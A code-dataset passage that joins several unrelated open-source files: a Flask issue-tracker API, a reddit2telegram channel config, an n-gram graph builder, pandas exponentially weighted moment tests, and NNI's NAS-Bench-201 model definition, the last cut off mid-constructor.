    @apiName ModifyIssueStatus
    @apiGroup 项目
    @apiDescription 切换缺陷处理状态
    @apiParam {int} handle_status 目标处理状态
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    # The form parser returns a sequence; the status is its first element.
    new_status = parse_json_form('handle_status')[0]
    return json_detail_render(IssueBusiness.status_switch(issue_id, new_status))
# 切换issue处理人
@issue.route('/handler/<int:issue_id>', methods=['POST'])
@validation('POST:handler_switch')
@required(modify_permission)
def issue_handler_switch_handler(issue_id):
    """
    @api {post} /v1/issue/handler/{int:id} 切换 缺陷处理人
    @apiName ModifyIssueSwitch
    @apiGroup 项目
    @apiDescription 切换缺陷处理人
    @apiParam {int} handler 新处理人 ID
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    new_handler = parse_json_form('handler_switch')
    return json_detail_render(IssueBusiness.handler_switch(issue_id, new_handler))
# 切换issue等级
@issue.route('/level/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:level_switch')
def issue_level_switch_handler(issue_id):
    """
    @api {post} /v1/issue/level/{int:id} 切换 缺陷等级
    @apiName ModifyIssueLevel
    @apiGroup 项目
    @apiDescription 切换缺陷等级
    @apiParam {int} level 目标等级
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    new_level = parse_json_form('level_switch')
    return json_detail_render(IssueBusiness.level_switch(issue_id, new_level))
# 切换issue优先级
@issue.route('/priority/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:priority_switch')
def issue_priority_switch_handler(issue_id):
    """
    @api {post} /v1/issue/priority/{int:id} 切换 缺陷优先级
    @apiName ModifyIssuePriority
    @apiGroup 项目
    @apiDescription 切换缺陷优先级
    @apiParam {int} priority 目标优先级
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    new_priority = parse_json_form('priority_switch')
    return json_detail_render(IssueBusiness.priority_switch(issue_id, new_priority))
# 修改issue的comment
@issue.route('/comment/<int:issue_id>', methods=['POST'])
@validation('POST:add_comment')
@required(modify_permission)
def issue_add_comment_handler(issue_id):
    """
    @api {post} /v1/issue/comment/{int:id} 切换 缺陷备注
    @apiName ModifyIssueComment
    @apiGroup 项目
    @apiDescription 修改缺陷备注
    @apiParam {string} comment 备注内容
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    new_comment = parse_json_form('add_comment')
    return json_detail_render(IssueBusiness.add_comment(issue_id, new_comment))
# 查询issue-projectid,versionid
@issue.route('/', methods=['GET'])
def issue_query_all_handler():
    """
    @api {get} /v1/issue/ 查询 issue 列表
    @apiName SearchIssue
    @apiGroup 项目
    @apiDescription 分页查询 issue 列表;传入 requirement_id 时按需求过滤
    @apiParam {int} [projectid] 项目 ID
    @apiParam {int} [versionid] 版本 ID
    @apiParam {string} [creator_id] 创建人 ID,使用 ',' 分割
    @apiParam {string} [handler_id] 处理人 ID,使用 ',' 分割
    @apiParam {int} [title] 标题
    @apiParam {string} [handle_status] 处理状态 ID,使用 ',' 分割
    @apiParam {string} [module_id] 模块 ID,使用 ',' 分割
    @apiParam {string} [priority] 优先级 ID,使用 ',' 分割
    @apiParam {int} [requirement_id] 需求 ID
    @apiParam {int} [page_size] 分页 页面大小
    @apiparam {int} [page_index] 分页 页数
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [...], "message": "ok",
         "page_index": 1, "page_size": 1, "total": 8}
    """
    requirement_id = request.args.get('requirement_id')
    # Pagination args are needed on both paths; parse them once instead of
    # duplicating the call in each branch (previous code repeated it).
    page_size, page_index = parse_list_args2()
    if requirement_id:
        data, count = IssueBusiness.paginate_data_by_rid(page_size, page_index,
                                                         requirement_id)
    else:
        data, count = IssueBusiness.paginate_data(page_size, page_index)
    return json_list_render2(0, data, page_size, page_index, count)
# 查询issue历史记录
@issue.route('/record', methods=['GET'])
def issue_record_query_all_handler():
    """
    @api {get} /v1/issue/record 查询 缺陷历史记录列表
    @apiName GetIssueRecordList
    @apiGroup 项目
    @apiDescription 查询缺陷历史记录列表
    @apiParam {int} projectid 项目 ID
    @apiParam {int} versionid 版本 ID
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [...], "message": "ok"}
    """
    return json_detail_render(0, IssueRecordBusiness.query_all_json())
# 查询issue历史记录详情
@issue.route('/record/detail/<int:issue_id>', methods=['GET'])
def issue_record_detail_handler(issue_id):
    """
    @api {get} /v1/issue/record/detail/{int:issue_id} 查询 缺陷历史记录详情
    @apiName GetIssueRecordDetailById
    @apiGroup 项目
    @apiDescription 查询单个缺陷的操作历史详情(修改人/时间/操作描述)
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [...], "message": "ok"}
    """
    return json_detail_render(0, IssueRecordBusiness.query_record_detail(issue_id))
# 根据id查询issue
@issue.route('/<int:issue_id>', methods=['GET'])
def issue_query_handler(issue_id):
    """
    @api {get} /v1/issue/{int:issue_id} 查询 缺陷详情 (id)
    @apiName GetIssueById
    @apiGroup 项目
    @apiDescription 根据 ID 查询缺陷详情
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [...], "message": "ok"}
    """
    return json_detail_render(0, IssueBusiness.query_by_id(issue_id))
# issue关闭和打开的dashboard
@issue.route('/dashboard', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_dashboard_work_handler():
    """Return opened/closed issue dashboard statistics for the
    [start_date, end_date] range taken from the 'issue_dashboard' form."""
    start_date, end_date = parse_json_form('issue_dashboard')
    data = IssueDashBoardBusiness.issue_dashboard(start_date, end_date)
    return json_detail_render(0, data)
# 查询测试人员每天创建的issue个数
@issue.route('/dashboard/tester', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def tester_issue_work_handler():
    """Return, per tester, the number of issues created each day within the
    [start_date, end_date] range taken from the 'issue_dashboard' form."""
    start_date, end_date = parse_json_form('issue_dashboard')
    data = IssueDashBoardBusiness.issue_all_tester_dashboard(start_date, end_date)
    return json_detail_render(0, data)
# issue的状态分布和优先级分布
@issue.route('/dashboard/project', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_project_dashboard_handler():
    """
    @api {POST} /v1/issue/dashboard/project 查询 缺陷状态分布和优先级分布
    @apiName GetIssueByStatusAndPriority
    @apiGroup 项目
    @apiDescription 查询指定时间段内缺陷的状态分布和优先级分布
    @apiParam {string} start_date 起始时间
    @apiParam {string} end_date 结束时间
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [...], "message": "ok"}
    """
    start_date, end_date = parse_json_form('issue_dashboard')
    return json_detail_render(
        0, IssueDashBoardBusiness.issue_project_dashboard(start_date, end_date))
# 看板根据pro_id查询issue各个状态的数量
@issue.route('/dashboard/project/<int:pro_id>', methods=['GET'])
def issue_query_pro_handler(pro_id):
    """
    @api {post} /v1/issue/dashboard/project/{int:project_id} 查询 看板缺陷 根据 project ID
    @apiName GetBoardIssueByProjectId
    @apiGroup 项目
    @apiDescription 按版本统计项目内各处理状态 (handle_status) 的缺陷数量
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [...], "message": "ok"}
    """
    return json_detail_render(
        0, IssueDashBoardBusiness.issue_project_id_dashboard(pro_id))
# 绑定 issue 到 requirement
@issue.route('/bind/requirement', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_bind_requirement')
def issue_bind_requirement():
    """
    @api {post} /v1/issue/bind/requirement 绑定 缺陷 issue 到 需求 requirement
    @apiName IssueBindRequirement
    @apiGroup 项目
    @apiDescription 绑定缺陷到需求
    @apiParam {int} issue_id 缺陷 ID
    @apiParam {int} requirement_id 需求 ID
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": [], "message": "ok"}
    """
    # NOTE: the schema yields (requirement_id, issue_id) in this order.
    requirement_id, issue_id = parse_json_form('issue_bind_requirement')
    code, msg = IssueBusiness.issue_bind_requirement(issue_id, requirement_id)
    return json_detail_render(code, [], msg)
# 导出 issue 列表
@issue.route('/export', methods=['GET'])
def issue_export():
    """
    @api {get} /v1/issue/export 导出 issue 到 xls
    @apiName IssueExportToXls
    @apiGroup 项目
    @apiDescription 导出当前查询条件下的 issue 列表为 xls,返回文件 URL
    @apiParam {int} [projectid] 项目 ID
    @apiParam {int} [versionid] 版本 ID
    @apiParam {int} [creator_id] 创建人 ID
    @apiParam {int} [handle_status] 处理状态 ID
    @apiParam {int} [module_id] 模块 ID
    @apiParam {int} [priority] 优先级 ID
    @apiSuccessExample {json} Success-Response:
        HTTP/1.1 200 OK
        {"code": 0, "data": "http://.../Issues-20190809.164431.xls", "message": "ok"}
    """
    return json_detail_render(code=0, data=IssueBusiness.export())
|
reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 187 | 10323 | #encoding:utf-8
from utils import weighted_random_subreddit
t_channel = '@news756'  # Telegram channel that receives the posts

# Pick the source subreddit for this run: politics and news, equal weight.
subreddit = weighted_random_subreddit({
    'politics': 0.5,
    'news': 0.5
})
def send_post(submission, r2t):
    """Forward *submission* to the Telegram channel through *r2t*.

    Every media type shares the same caption layout; text posts also carry
    the selftext, while albums and other link posts include the URL.
    """
    caption = '{title}\n\n/r/{subreddit_name}\n{short_link}'
    with_link = '{title}\n{link}\n\n/r/{subreddit_name}\n{short_link}'
    return r2t.send_simple(
        submission,
        text='{title}\n\n{self_text}\n\n/r/{subreddit_name}\n{short_link}',
        gif=caption,
        img=caption,
        album=with_link,
        other=with_link,
    )
|
source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 178 | 10333 | <gh_stars>100-1000
"""
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
class DocumentNGramSymWinGraph(DocumentNGramGraph):
    # an extension of DocumentNGramGraph
    # for symmetric windowing
    def buildGraph(self,verbose = False, d=[]):
        # NOTE(review): the mutable default `d=[]` is shared across calls;
        # it is only read here (passed to setData), so it is kept as-is.
        # set Data @class_variable
        self.setData(d)
        Data = self._Data
        # build ngram
        ng = self.build_ngram()
        s = len(ng)
        # calculate window
        # Symmetric window: half the configured window size on each side.
        win = self._Dwin//2
        # initialize graph
        self._Graph = nx.Graph()
        if(s>=2 and win>=1):
            # max possible window size (bounded by win)
            o = min(win,s)+1
            # `window` holds the upcoming ngrams within the window; it
            # slides forward one ngram per outer-loop iteration.
            window = ng[1:o]
            i = o
            # first build the full window
            for gram in ng[0:s-1]:
                for w in window:
                    # addEdgeInc (from DocumentNGramGraph) adds the edge or
                    # increments its weight -- TODO confirm exact semantics.
                    self.addEdgeInc(gram,w)
                window.pop(0)
                # if window's edge has reached
                # it's the limit of ng stop
                # appending
                if i<s:
                    window.append(ng[i][:])
                    i+=1
        # print Graph (optional)
        if verbose:
            self.GraphDraw(self._GPrintVerbose)
        return self._Graph
|
venv/Lib/site-packages/pandas/tests/window/moments/test_moments_consistency_ewm.py | ajayiagbebaku/NFL-Model | 28,899 | 10345 | import numpy as np
import pytest
from pandas import (
DataFrame,
Series,
concat,
)
import pandas._testing as tm
@pytest.mark.parametrize("func", ["cov", "corr"])
def test_ewm_pairwise_cov_corr(func, frame):
result = getattr(frame.ewm(span=10, min_periods=5), func)()
result = result.loc[(slice(None), 1), 5]
result.index = result.index.droplevel(1)
expected = getattr(frame[1].ewm(span=10, min_periods=5), func)(frame[5])
tm.assert_series_equal(result, expected, check_names=False)
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov(name):
    """EWM cov/corr of two partially-NaN series is NaN exactly until
    min_periods valid pairwise observations have been seen."""
    A = Series(np.random.randn(50), index=np.arange(50))
    B = A[2:] + np.random.randn(48)
    # Fixed: the `np.NaN` alias was removed in NumPy 2.0; use np.nan.
    A[:10] = np.nan
    B[-10:] = np.nan

    result = getattr(A.ewm(com=20, min_periods=5), name)(B)
    # A is NaN through index 9, plus min_periods-1 warm-up observations.
    assert np.isnan(result.values[:14]).all()
    assert not np.isnan(result.values[14:]).any()
@pytest.mark.parametrize("min_periods", [0, 1, 2])
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov_min_periods(name, min_periods):
    """min_periods handling for binary EWM moments (GH 7898), including
    length-0 and length-1 inputs."""
    # GH 7898
    A = Series(np.random.randn(50), index=np.arange(50))
    B = A[2:] + np.random.randn(48)
    # Fixed: the `np.NaN` alias was removed in NumPy 2.0; use np.nan.
    A[:10] = np.nan
    B[-10:] = np.nan

    result = getattr(A.ewm(com=20, min_periods=min_periods), name)(B)
    # binary functions (ewmcov, ewmcorr) with bias=False require at
    # least two values
    assert np.isnan(result.values[:11]).all()
    assert not np.isnan(result.values[11:]).any()

    # check series of length 0
    empty = Series([], dtype=np.float64)
    result = getattr(empty.ewm(com=50, min_periods=min_periods), name)(empty)
    tm.assert_series_equal(result, empty)

    # check series of length 1
    result = getattr(Series([1.0]).ewm(com=50, min_periods=min_periods), name)(
        Series([1.0])
    )
    tm.assert_series_equal(result, Series([np.nan]))
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_different_input_array_raise_exception(name):
    """Passing a bare ndarray (not Series/DataFrame) to cov/corr raises."""
    A = Series(np.random.randn(50), index=np.arange(50))
    # Fixed: the `np.NaN` alias was removed in NumPy 2.0; use np.nan.
    A[:10] = np.nan

    msg = "other must be a DataFrame or Series"
    # exception raised is Exception
    with pytest.raises(ValueError, match=msg):
        getattr(A.ewm(com=20, min_periods=5), name)(np.random.randn(50))
def create_mock_weights(obj, com, adjust, ignore_na):
    """Reference EWM weights for a Series or DataFrame (column-wise)."""
    if not isinstance(obj, DataFrame):
        return create_mock_series_weights(obj, com, adjust, ignore_na)
    if not len(obj.columns):
        return DataFrame(index=obj.index, columns=obj.columns)
    per_column = [
        create_mock_series_weights(
            obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
        )
        for i in range(len(obj.columns))
    ]
    w = concat(per_column, axis=1)
    w.index = obj.index
    w.columns = obj.columns
    return w
def create_mock_series_weights(s, com, adjust, ignore_na):
    """Reference implementation of the weights pandas' EWM applies to *s*.

    NaN entries get no weight; with ignore_na=False they still advance the
    position counter (so later weights are discounted across the gap).
    """
    weights = Series(np.nan, index=s.index)
    alpha = 1.0 / (1.0 + com)
    if adjust:
        seen = 0
        for i in range(len(s)):
            if s.iat[i] == s.iat[i]:  # NaN != NaN: true only for valid values
                weights.iat[i] = (1.0 / (1.0 - alpha)) ** seen
                seen += 1
            elif not ignore_na:
                seen += 1
    else:
        running_total = 0.0
        last_valid = -1
        seen = 0
        for i in range(len(s)):
            if s.iat[i] == s.iat[i]:
                if last_valid == -1:
                    weights.iat[i] = 1.0
                else:
                    weights.iat[i] = (
                        alpha * running_total / (1.0 - alpha) ** (seen - last_valid)
                    )
                running_total += weights.iat[i]
                last_valid = seen
                seen += 1
            elif not ignore_na:
                seen += 1
    return weights
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_mean(consistency_data, adjust, ignore_na, min_periods):
    """EWM mean equals the weighted cumulative average built from the
    reference weights."""
    x, is_constant, no_nans = consistency_data
    com = 3.0
    result = x.ewm(
        com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
    ).mean()
    weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
    weighted = x.multiply(weights)
    expected = weighted.cumsum().divide(weights.cumsum()).fillna(method="ffill")
    threshold = max(min_periods, 1) if min_periods else 1
    expected[x.expanding().count() < threshold] = np.nan
    tm.assert_equal(result, expected.astype("float64"))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_consistent(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding().count()
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x)
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
tm.assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
tm.assert_equal(corr_x_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_var_debiasing_factors(
    consistency_data, adjust, ignore_na, min_periods
):
    """Unbiased var == biased var * debiasing factor, where the factor
    is derived from the reference weights."""
    x, is_constant, no_nans = consistency_data
    com = 3.0
    # check variance debiasing factors
    var_unbiased_x = x.ewm(
        com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
    ).var(bias=False)
    var_biased_x = x.ewm(
        com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
    ).var(bias=True)

    weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
    cum_sum = weights.cumsum().fillna(method="ffill")
    cum_sum_sq = (weights * weights).cumsum().fillna(method="ffill")
    numerator = cum_sum * cum_sum
    denominator = numerator - cum_sum_sq
    denominator[denominator <= 0.0] = np.nan
    tm.assert_equal(var_unbiased_x, var_biased_x * (numerator / denominator))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
if bias:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = (
(x * x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.mean()
)
tm.assert_equal(var_x, mean_x2 - (mean_x * mean_x))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var_constant(
    consistency_data, adjust, ignore_na, min_periods, bias
):
    # A constant series has zero variance wherever enough observations exist.
    x, is_constant, no_nans = consistency_data
    if not is_constant:
        return

    count_x = x.expanding(min_periods=min_periods).count()
    var_x = x.ewm(
        com=3.0, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
    ).var(bias=bias)

    # check that variance of constant series is identically 0
    assert not (var_x > 0).any().any()
    expected = x * np.nan
    expected[count_x >= max(min_periods, 1)] = 0.0
    if not bias:
        # Unbiased variance requires at least two observations.
        expected[count_x < 2] = np.nan
    tm.assert_equal(var_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_std(consistency_data, adjust, ignore_na, min_periods, bias):
    # std(x)^2 must reproduce var(x); both quantities are non-negative.
    x, is_constant, no_nans = consistency_data
    ewm_kwargs = dict(
        com=3.0, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
    )
    var_x = x.ewm(**ewm_kwargs).var(bias=bias)
    std_x = x.ewm(**ewm_kwargs).std(bias=bias)
    assert not (var_x < 0).any().any()
    assert not (std_x < 0).any().any()
    # check that var(x) == std(x)^2
    tm.assert_equal(var_x, std_x * std_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_cov(consistency_data, adjust, ignore_na, min_periods, bias):
    # cov(x, x) must reproduce var(x); both quantities are non-negative.
    x, is_constant, no_nans = consistency_data
    ewm_kwargs = dict(
        com=3.0, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
    )
    var_x = x.ewm(**ewm_kwargs).var(bias=bias)
    assert not (var_x < 0).any().any()

    cov_x_x = x.ewm(**ewm_kwargs).cov(x, bias=bias)
    assert not (cov_x_x < 0).any().any()

    # check that var(x) == cov(x, x)
    tm.assert_equal(var_x, cov_x_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_series_cov_corr(
    consistency_data, adjust, ignore_na, min_periods, bias
):
    # Covariance/correlation identities for Series, with y taken equal to x.
    x, is_constant, no_nans = consistency_data
    if not isinstance(x, Series):
        return
    ewm_kwargs = dict(
        com=3.0, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
    )

    var_x_plus_y = (x + x).ewm(**ewm_kwargs).var(bias=bias)
    var_x = x.ewm(**ewm_kwargs).var(bias=bias)
    var_y = x.ewm(**ewm_kwargs).var(bias=bias)
    cov_x_y = x.ewm(**ewm_kwargs).cov(x, bias=bias)
    # check that cov(x, y) == (var(x+y) - var(x) -
    # var(y)) / 2
    tm.assert_equal(cov_x_y, 0.5 * (var_x_plus_y - var_x - var_y))

    # check that corr(x, y) == cov(x, y) / (std(x) *
    # std(y))
    corr_x_y = x.ewm(**ewm_kwargs).corr(x, bias=bias)
    std_x = x.ewm(**ewm_kwargs).std(bias=bias)
    std_y = x.ewm(**ewm_kwargs).std(bias=bias)
    tm.assert_equal(corr_x_y, cov_x_y / (std_x * std_y))

    if bias:
        # check that biased cov(x, y) == mean(x*y) -
        # mean(x)*mean(y)
        mean_x = x.ewm(**ewm_kwargs).mean()
        mean_y = x.ewm(**ewm_kwargs).mean()
        mean_x_times_y = (x * x).ewm(**ewm_kwargs).mean()
        tm.assert_equal(cov_x_y, mean_x_times_y - (mean_x * mean_y))
|
nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 2,305 | 10349 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
# Candidate operations for a NAS-Bench-201 cell edge, keyed by operation name.
# Each value is a factory ``(C_in, C_out, stride) -> nn.Module``; the classes
# referenced here (Zero, Pooling, ReLUConvBN, FactorizedReduce) are defined
# later in this module.
OPS_WITH_STRIDE = {
    'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
    'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
    'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
    'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
    'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
    'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
    else FactorizedReduce(C_in, C_out, stride),
}

# The five operation names that make up the NAS-Bench-201 search space.
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
class ReLUConvBN(nn.Module):
    """Pre-activation convolution block: ReLU -> Conv2d (no bias) -> BatchNorm2d."""

    def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
        super(ReLUConvBN, self).__init__()
        layers = [
            nn.ReLU(inplace=False),
            nn.Conv2d(C_in, C_out, kernel_size, stride=stride,
                      padding=padding, dilation=dilation, bias=False),
            nn.BatchNorm2d(C_out),
        ]
        self.op = nn.Sequential(*layers)

    def forward(self, x):
        """Apply ReLU, convolution and batch-norm in sequence."""
        return self.op(x)
class SepConv(nn.Module):
    """Depthwise-separable conv: ReLU -> depthwise conv -> 1x1 pointwise conv -> BN."""

    def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
        super(SepConv, self).__init__()
        depthwise = nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride,
                              padding=padding, dilation=dilation, groups=C_in,
                              bias=False)
        pointwise = nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False)
        self.op = nn.Sequential(
            nn.ReLU(inplace=False),
            depthwise,
            pointwise,
            nn.BatchNorm2d(C_out),
        )

    def forward(self, x):
        return self.op(x)
class Pooling(nn.Module):
    """3x3 average or max pooling; a 1x1 ReLUConvBN first maps channels if needed."""

    def __init__(self, C_in, C_out, stride, mode):
        super(Pooling, self).__init__()
        # Only adjust the channel count when input and output widths differ.
        self.preprocess = None if C_in == C_out else ReLUConvBN(C_in, C_out, 1, 1, 0, 1)
        if mode == 'avg':
            self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)
        elif mode == 'max':
            self.op = nn.MaxPool2d(3, stride=stride, padding=1)
        else:
            raise ValueError('Invalid mode={:} in Pooling'.format(mode))

    def forward(self, x):
        if self.preprocess is not None:
            x = self.preprocess(x)
        return self.op(x)
class Zero(nn.Module):
    """The 'none' operation: emits zeros shaped like the op it replaces."""

    def __init__(self, C_in, C_out, stride):
        super(Zero, self).__init__()
        self.C_in = C_in
        self.C_out = C_out
        self.stride = stride
        self.is_zero = True

    def forward(self, x):
        if self.C_in != self.C_out:
            # Channel change: emit zeros with C_out channels.
            # NOTE(review): spatial stride is NOT applied on this path —
            # behavior preserved from the original implementation.
            out_shape = list(x.shape)
            out_shape[1] = self.C_out
            return x.new_zeros(out_shape, dtype=x.dtype, device=x.device)
        if self.stride == 1:
            return x.mul(0.)
        return x[:, :, ::self.stride, ::self.stride].mul(0.)
class FactorizedReduce(nn.Module):
    """Halve the spatial size with two offset 1x1 stride-2 convs, concatenated on channels."""

    def __init__(self, C_in, C_out, stride):
        super(FactorizedReduce, self).__init__()
        self.stride = stride
        self.C_in = C_in
        self.C_out = C_out
        self.relu = nn.ReLU(inplace=False)
        if stride != 2:
            # Only stride-2 reduction is supported by this block.
            raise ValueError('Invalid stride : {:}'.format(stride))
        # Split the output channels between the two convolution branches.
        branch_channels = (C_out // 2, C_out - C_out // 2)
        self.convs = nn.ModuleList(
            nn.Conv2d(C_in, c, 1, stride=stride, padding=0, bias=False)
            for c in branch_channels
        )
        # Pad right/bottom by one so the shifted branch stays aligned.
        self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)
        self.bn = nn.BatchNorm2d(C_out)

    def forward(self, x):
        x = self.relu(x)
        # Second branch sees the input shifted by one pixel (via pad + crop).
        shifted = self.pad(x)[:, :, 1:, 1:]
        out = torch.cat([self.convs[0](x), self.convs[1](shifted)], dim=1)
        return self.bn(out)
class ResNetBasicblock(nn.Module):
    """Two 3x3 ReLUConvBN layers with a residual shortcut (the reduction cell)."""

    def __init__(self, inplanes, planes, stride):
        super(ResNetBasicblock, self).__init__()
        assert stride == 1 or stride == 2, 'invalid stride {:}'.format(stride)
        self.conv_a = ReLUConvBN(inplanes, planes, 3, stride, 1, 1)
        self.conv_b = ReLUConvBN(planes, planes, 3, 1, 1, 1)
        if stride == 2:
            # Downsample the identity path with avg-pool followed by 1x1 conv.
            self.downsample = nn.Sequential(
                nn.AvgPool2d(kernel_size=2, stride=2, padding=0),
                nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, padding=0, bias=False))
        elif inplanes != planes:
            # Same resolution but different width: map channels with 1x1 conv.
            self.downsample = ReLUConvBN(inplanes, planes, 1, 1, 0, 1)
        else:
            self.downsample = None
        self.in_dim = inplanes
        self.out_dim = planes
        self.stride = stride
        self.num_conv = 2

    def forward(self, inputs):
        branch = self.conv_b(self.conv_a(inputs))
        shortcut = inputs if self.downsample is None else self.downsample(inputs)
        return shortcut + branch
@model_wrapper
class NasBench201(nn.Module):
    """The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__.

    It's a stack of :class:`NasBench201Cell`: N normal cells, a reduction
    block, N cells, a reduction block, and N more cells, followed by global
    pooling and a linear classifier.
    """
    def __init__(self,
                 stem_out_channels: int = 16,
                 num_modules_per_stack: int = 5,
                 num_labels: int = 10):
        super().__init__()
        self.channels = C = stem_out_channels
        self.num_modules = N = num_modules_per_stack
        self.num_labels = num_labels
        # 3x3 stem convolution.
        self.stem = nn.Sequential(
            nn.Conv2d(3, C, kernel_size=3, padding=1, bias=False),
            nn.BatchNorm2d(C)
        )
        # Channel widths double at each of the two reduction stages.
        layer_channels = [C] * N + [C * 2] + [C * 2] * N + [C * 4] + [C * 4] * N
        layer_reductions = [False] * N + [True] + [False] * N + [True] + [False] * N
        C_prev = C
        self.cells = nn.ModuleList()
        for C_curr, reduction in zip(layer_channels, layer_reductions):
            if reduction:
                cell = ResNetBasicblock(C_prev, C_curr, 2)
            else:
                # BUGFIX: bind ``prim`` per-lambda via a default argument.
                # The previous ``lambda C_in, C_out: OPS_WITH_STRIDE[prim](...)``
                # captured the comprehension variable by reference (late
                # binding), so after the comprehension finished every factory
                # built the *last* primitive regardless of its dict key.
                ops: Dict[str, Callable[[int, int], nn.Module]] = {
                    prim: (lambda C_in, C_out, prim=prim: OPS_WITH_STRIDE[prim](C_in, C_out, 1))
                    for prim in PRIMITIVES
                }
                cell = NasBench201Cell(ops, C_prev, C_curr, label='cell')
            self.cells.append(cell)
            C_prev = C_curr
        self.lastact = nn.Sequential(
            nn.BatchNorm2d(C_prev),
            nn.ReLU(inplace=True)
        )
        self.global_pooling = nn.AdaptiveAvgPool2d(1)
        self.classifier = nn.Linear(C_prev, self.num_labels)

